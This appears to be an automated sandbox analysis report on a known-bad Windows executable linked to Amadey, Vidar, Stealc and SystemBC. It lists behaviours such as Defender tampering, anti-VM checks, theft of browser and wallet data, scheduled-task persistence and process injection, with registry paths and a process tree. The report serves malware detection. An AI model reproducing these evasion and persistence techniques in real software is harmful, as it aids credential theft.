Analysis Overview
SHA256
3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
Threat Level: Known bad
The file 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe was found to be: Known bad.
Malicious Activity Summary
GCleaner
Modifies Windows Defender TamperProtection settings
Vidar
Modifies Windows Defender Real-time Protection settings
Systembc family
SystemBC
Detect Vidar Stealer
Vidar family
Modifies Windows Defender DisableAntiSpyware settings
Amadey family
Detects Healer an antivirus disabler dropper
Gcleaner family
Healer family
Stealc family
Healer
Modifies Windows Defender notification settings
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Reads user/profile data of web browsers
.NET Reactor proctector
Identifies Wine through registry keys
Reads user/profile data of local email clients
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Windows security modification
Executes dropped EXE
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
AutoIT Executable
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Program crash
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-02 02:18
Signatures
Amadey family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-02 02:18
Reported
2025-03-02 02:21
Platform
win7-20241010-en
Max time kernel
71s
Max time network
154s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 944 set thread context of 1272 | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1640 set thread context of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe |
| PID 1692 set thread context of 2912 | N/A | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
"C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe"
C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
"C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe"
C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 500
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
